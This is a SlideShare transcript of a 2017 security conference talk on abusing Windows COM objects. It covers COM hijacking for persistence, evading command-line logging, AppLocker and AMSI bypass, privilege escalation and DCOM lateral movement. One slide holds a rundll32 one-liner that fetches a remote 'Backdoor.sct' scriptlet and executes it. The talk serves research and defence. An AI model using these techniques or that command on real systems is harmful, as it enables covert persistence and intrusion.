SlideShare a Scribd company logo

Windows Operating System Archaeology

Download as PPTX, PDF
E
enigma0x3

Given at BSides Nashville 2017. The modern Windows Operating System carries with it an incredible amount of legacy code. The Component Object Model (COM) has left a lasting impact on Windows. This technology is far from dead as it continues to be the foundation for many aspects of the Windows Operating System. You can find hundreds of COM Classes defined by CLSID (COM Class Identifiers). Do you know what they do? This talk seeks to expose tactics long forgotten by the modern defender. We seek to bring to light artifacts in the Windows OS that can be used for persistence. We will present novel tactics for persistence using only the registry and COM objects.

Related slideshows

PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
PowerShell Inside Out: Applied .NET Hacking for Enhanced Visibility by Satosh...
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
1 of 47
Windows Operating System Archaeology Matt Nelson Casey Smith
Who Are We? - Casey Smith (@subTee) - Mandiant Red Team - subt0x10.blogspot.com - Matt Nelson (@enigma0x3) - Operator and Security Researcher at SpecterOps - enigma0x3.net
Objectives For This Talk Foster curiosity & further research Provide references Call attention to the attack surface and capabilities
What Will We Discuss? COM Overview COM Research Methodology Malicious COM Tactics
COM Overview -Brief Background -Registration -Resolution
COM Architecture and History - in 2 minutes ;-) What are COM components? COM components are cross-language classes backed by: DLL (Dynamic-Link Libraries) OCX (ActiveX controls) TLB (Type Libraries ) EXE (Executables) SCT ( XML files ) Location Transparency Principle
Example - COM Scriptlet XML XML Files - We use these for POC examples Registration Block
COM Object Type Registration To find a component when a program needs it, it is USUALLY registered What Registry keys are related to COM object registration? HKLM + HKCU HKCR
What registry entries are needed to register a COM object? https://blogs.msdn.microsoft.com/larryosterman/2006/01/11/what-registry-entries- are-needed-to-register-a-com-object/ Also XRef: Minimal COM object registration https://blogs.msdn.microsoft.com/larryosterman/2006/01/05/minimal-com-object- registration/
COM Object Type Resolution CLSID - GUID - {AAAA1111-0000-0000-0000-0000FEEDACDC} ProgID - String Monikers - “scriptlet:http://example.com/file.sct” GetObject - CreateObject Methods rundll32.exe javascript:"..mshtml,RunHTMLApplication ";a=GetObject('scriptlet:https://example.com/Backdoor.sct');a.Exec();close();
WMI GetObject example
Registry Example
COM Registry Keys https://msdn.microsoft.com/en-us/library/windows/desktop/ms678477(v=vs.85).aspx Regsvr32.exe Regasm.exe Regsvcs.exe These tools usually handle the registration and registry key population for us.
Example Call To Create/Locate an Object
What does all this mean? COM Artifacts and details can be found in the registry. Usually...
Avoid Registration Process
Sample Objective: Execute .NET code inside Windows Scripting Host Without registering the COM object.
Registration-Free COM Activation Microsoft.Windows.ActCtx Object Attach a Manifest or Download ManifestURL Loads dll without registration. https://github.com/subTee/RegistrationFreeCOM
Windows Operating System Archaeology
RegistrationHelper - Bypass via CScript.exe https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
Example https://gist.github.com/subTee/631f859c7890316b7e9a880cf4a51500
In Memory Assembly Execution JScript/VBScript https://github.com/tyranid/DotNetToJScript This is Amazing! Executes a .NET assembly IN JSCRIPT This dramatically extends capabilities of COM Scriptlets No Dll On Disk. Works for .NET 2 and 3.5 Only
Windows Operating System Archaeology
Methodology Examples Using Procmon to trace resolution
Example - There are DOZENS of these
Excavation Tools James Forshaw - OleViewDotNet - https://github.com/tyranid/oleviewdotnet Mark Russonovich - ProcMon - https://technet.microsoft.com/en- us/sysinternals/processmonitor RPCView - http://rpcview.org API Spy - http://www.rohitab.com/apimonitor
Malicious Tactics Overview Persistence COM Hijacking - Evasion Office Add-Ins Privilege Escalation Lateral Movement
Persistence via COM Hijacking Leveraging Per-User COM Objects, we can divert resolution to an object under our control. Registry Only Persistence “TreatAs” hijack COM handler hijacking (scheduled tasks) https://msdn.microsoft.com/en-us/library/windows/desktop/ms679737(v=vs.85).aspx https://github.com/subTee/OSArchaeology/blob/master/COM/TreatAsPersistence.reg https://enigma0x3.net/2016/05/25/userland-persistence-with-scheduled-tasks-and- com-handler-hijacking/
Persistence via COM Hijacking
DEMO Registry Only Persistence
Evasion Windows very often resolves COM objects via the HKCU hive first Find your favorite script that implements GetObject() or CreateObject() and hijack it. This allows you to instantiate your own code without exposing it via the command line.
Abusing WSH: VBScript Injection Leverage an existing, signed VBScript to run our code
C:WindowsSystem32Printing_Admin_Scriptsen-US pubprn.vbs For example: Windows printing script pubprn.vbs calls GetObject on a parameter we control. Can use this to execute a COM scriptlet
Example: Evade Command Line Logging slmgr.vbs instantiates Scripting.Dictionary via CreateObject(). Hijack that object to make it run your code
Source Code of Slmgr.vbs Default System File
Example: Evade Command Line Logging
This is also a clever way to bypass AppLocker ;-) Winrm.vbs
Bypass the AntiMalware Scan Interface (AMSI)
Malicious Office Add-ins Outlook, Excel etc. Rich API for persistence and C2 https://twitter.com/JohnLaTwC/status/836259629277421568 Outlook Rules Added Via COM Object https://gist.github.com/subTee/e04a93260cc69772322502545c2121c4 https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
Privilege Escalation The COM Elevation Moniker - Resources -Execute Process in Another user’s session -Think Terminal Server or RDP etc…
COM - CVE-2017-0100 https://drive.google.com/file/d/0B5sMkPVXQnfPbXI0SVliV0tuU0U/view - James Forshaw
Domain Admin Elevation http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html @n0pe_sled
Lateral Movement - Leveraging DCOM objects with no explicit access or launch permissions set - Certain objects have interesting methods… https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application- com-object/ https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
Windows Operating System Archaeology
Conclusions
Hopeful outcomes of this talk. Foster curiosity & further research Provide references Call attention to the attack surface and capabilities
Closing Thoughts / Conclusions / Thanks Special Thanks to: David Mcguire & Jason Frank for their support of this research while we were working for them. James Forshaw - For answering our questions and COM research All of the former ATD members who provided feedback and improvements to our research!

More Related Content

Windows Operating System Archaeology

Editor's Notes

  1. Casey
  2. Casey/Matt
  3. Casey
  4. Casey
  5. Casey
  6. Casey https://cansecwest.com/slides/2015/Smart_COM_Fuzzing_Auditing_IE_Sandbox_Bypass_in_COM_Objects-Xiaoning_li.pdf https://www.blackhat.com/docs/us-14/materials/us-14-Forshaw-Digging-For_IE11-Sandbox-Escapes.pdf COM Specification: http://www.daimi.au.dk/~datpete/COT/COM_SPEC/pdf/com_spec.pdf Windows COM Dependency/History/Origins James Forshaw’s talk at Troopers and Infiltrate
  7. Casey Necessary For GetObject
  8. Casey AppID, CLSID Explain HKCR vs hkcu/hklm
  9. Casey
  10. Casey https://blogs.msdn.microsoft.com/cristib/2012/10/31/how-com-works-how-to-build-a-com-visible-dll-in-c-net-call-it-from-vba-and-select-the-proper-classinterface-autodispatch-autodual-part12/ Be sure to reference script:http for Matt’s malicious demos
  11. Casey Importance Of GetObject
  12. Casey
  13. Casey From COM Specification
  14. Casey
  15. Casey
  16. Casey
  17. Casey
  18. Casey (maybe add arrows)
  19. Casey
  20. Matt Resolution fails as well
  21. Matt (reference treatas)
  22. Casey/Matt
  23. Matt
  24. Matt http://www.nobunkum.ru/analytics/en-com-hijacking https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence https://attack.mitre.org/wiki/Technique/T1122
  25. Matt
  26. Matt
  27. Matt
  28. Matt
  29. Matt Source Code of pubprn.vbs Injectable args(1)
  30. Matt
  31. Matt Point out why that injection is possible. We can hijack the script at CreateObject - before the rest of the logic!
  32. Matt
  33. Matt
  34. Matt
  35. Matt
  36. Casey https://msdn.microsoft.com/en-us/library/ms679687.aspx - COM Elevation Moniker https://bugs.chromium.org/p/project-zero/issues/detail?id=1021&can=1&q=&sort=-id%20-%20P0%20EoP Reference Julian n0pe_sleds write up once posted on using this trick to get DA. http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html
  37. Casey https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=262285 http://blog.inspired-sec.com/archive/2017/03/17/COM-Moniker-Privesc.html Windows HelpPane Elevation of Privilege Vulnerability - CVE-2017-0100 An elevation of privilege exists in Windows when a DCOM object in Helppane.exe configured to run as the interactive user fails to properly authenticate the client. An attacker who successfully exploited the vulnerability could run arbitrary code in another user's session. To exploit the vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability once another user logged in to the same system via Terminal Services or Fast User Switching. The update addresses the vulnerability by correcting how Helppane.exe authenticates the client. The following table contains links to the standard entry for each vulnerability in the Common Vulnerabilities and Exposures list: Vulnerability title CVE number Publicly disclosed Exploited Windows HelpPane Elevation of Privilege Vulnerability CVE-2017-0100 No No
  38. Casey
  39. Matt
  40. Matt
  41. Matt